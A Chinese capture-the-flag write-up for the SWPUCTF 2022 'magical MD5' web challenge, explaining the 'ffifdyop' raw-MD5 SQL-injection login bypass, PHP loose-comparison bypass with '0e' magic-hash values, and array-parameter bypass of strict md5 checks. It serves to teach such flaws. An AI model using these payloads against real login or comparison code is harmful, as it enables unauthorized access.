NSSCTF每日一题_Web_[SWPUCTF 2022 新生赛]奇妙的MD5

为了保持做题的感觉和持续学习,也就有了每日一题系列,选一些有意义的题目或者一些CTF新颖题目作为参考学习。

[SWPUCTF 2022 新生赛]奇妙的MD5

1. 访问首页界面并进行分析

估计题目MD5提示,查询得知

ffifdyop 这个字符串是一个奇妙的MD5字符串

因为将"ffifdyop"MD5每两位十六进制对应一个 ASCII 字符之后有'or'6 ,本身看似无意义,但一旦放入早期未做安全防护的 SQL 登录验证语句 中,就会瞬间改变逻辑,代入SQL后语句会被解析为查询逻辑为 **"真,**导致整个查询条件恒成立,实现 SQL注入攻击

2.查询字符串ffifdyop

3.查看源码,绕过弱比较

复制代码
<!--
$x= $GET['x'];
$y = $_GET['y'];
if($x != $y && md5($x) == md5($y)){
    ;
-->

#字符不相同,但是md5值相同

0e 绕过 即可

复制代码
?x=QNKCDZO&y=240610708

(这类字符有很多)

复制代码
QNKCDZO
240610708
314282422
571579406
903251147
s878926199a
s155964671a
s214587387a
s214587387a

4.下一步,数组绕过强比较

复制代码
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
    echo $FLAG;
} 

wqh[]=1&dsy[]=2
相关推荐
Bruce_Liuxiaowei1 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
爱隐身的官人3 天前
Web知识的总结
web安全·ctf
诗人不说梦^3 天前
[SWPUCTF 2018]SimplePHP
web·ctf
Chen--Xing3 天前
宁波市第八届网络安全大赛 -- Crypto -- WriteUp
ctf·crypto·宁波市第八届网络安全大赛
clover_pro4 天前
扩展中国剩余定理脚本(恢复密文c)
学习·ctf
uwvwko5 天前
buuctf——web刷题第5页
前端·python·php·web·ctf·buuctf
Bruce_Liuxiaowei5 天前
网络端口与服务对应表 - 白帽子安全参考指南
网络·windows·安全·web安全·ctf
mosan12311 天前
【数据安全竞赛】BUUCTF·[Dest0g3 520迎新赛]StrangeTraffic
ctf·流量分析·数据安全竞赛
huluang13 天前
i春秋CTF实战:破解Crypto ezxor谜题,从异或迷阵到Flag重现
ctf